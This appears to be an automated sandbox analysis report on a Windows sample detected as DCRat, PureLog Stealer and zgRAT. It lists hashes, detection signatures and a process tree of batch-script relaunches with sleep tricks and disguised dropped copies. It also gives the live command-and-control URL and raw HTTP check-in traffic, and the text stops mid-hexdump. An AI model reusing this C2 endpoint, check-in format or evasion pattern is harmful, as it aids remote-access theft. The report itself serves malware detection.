Edit tour

Windows Analysis Report
OH6KO8NBy1.exe

Overview

General Information

Sample name:	OH6KO8NBy1.exe renamed because original name is a hash value
Original sample name:	07a0fb75f52c87371c88f48ae80afa1b.exe
Analysis ID:	1583918
MD5:	07a0fb75f52c87371c88f48ae80afa1b
SHA1:	a2184c8f4c5a1b81a1e8bf426db05eac504a66a0
SHA256:	51df5cf4f67d6148c92d2bdaa10596f2952371b8c3ec85d21cdf74af6274af34
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

OH6KO8NBy1.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\OH6KO8NBy1.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 7544 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7604 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7632 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 7676 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 7768 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7840 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 7992 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8124 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 8144 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 4960 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 3592 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1344 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4308 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 2188 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 4624 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7504 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7612 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 7508 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 7640 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7552 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7736 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 7716 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 5348 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4476 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4420 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 7860 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7960 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 8012 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 8068 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 932 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3192 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7252 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 5824 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 6596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4856 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7096 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 1144 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 8096 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5544 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4336 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 1856 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 6072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2056 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4544 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EGjcLJxUTLCptztefbFicvsgXASnZ.exe (PID: 7372 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)

cmd.exe (PID: 5924 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
OH6KO8NBy1.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
OH6KO8NBy1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\UserOOBEBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\UserOOBEBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1653332376.0000000000682000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.1750679777.0000000002A29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000B.00000002.1859735247.0000000002727000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: OH6KO8NBy1.exe PID: 7476	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: EGjcLJxUTLCptztefbFicvsgXASnZ.exe PID: 7676	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: EGjcLJxUTLCptztefbFicvsgXASnZ.exe PID: 7992	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.OH6KO8NBy1.exe.680000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.OH6KO8NBy1.exe.680000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T21:12:15.663649+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49736	206.188.197.24	80	TCP
2025-01-03T21:12:26.304306+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49738	206.188.197.24	80	TCP
2025-01-03T21:12:33.163719+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49739	206.188.197.24	80	TCP
2025-01-03T21:12:43.913772+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49740	206.188.197.24	80	TCP
2025-01-03T21:12:54.726293+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49742	206.188.197.24	80	TCP
2025-01-03T21:13:05.523233+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49799	206.188.197.24	80	TCP
2025-01-03T21:13:12.523236+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49838	206.188.197.24	80	TCP
2025-01-03T21:13:19.288902+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49879	206.188.197.24	80	TCP
2025-01-03T21:13:31.007664+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49949	206.188.197.24	80	TCP
2025-01-03T21:13:37.726443+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49990	206.188.197.24	80	TCP
2025-01-03T21:13:48.820248+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50013	206.188.197.24	80	TCP
2025-01-03T21:13:59.585903+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50014	206.188.197.24	80	TCP

HTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 206.188.197.24Content-Length: 336Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:12:04 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:12:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:12:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:12:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 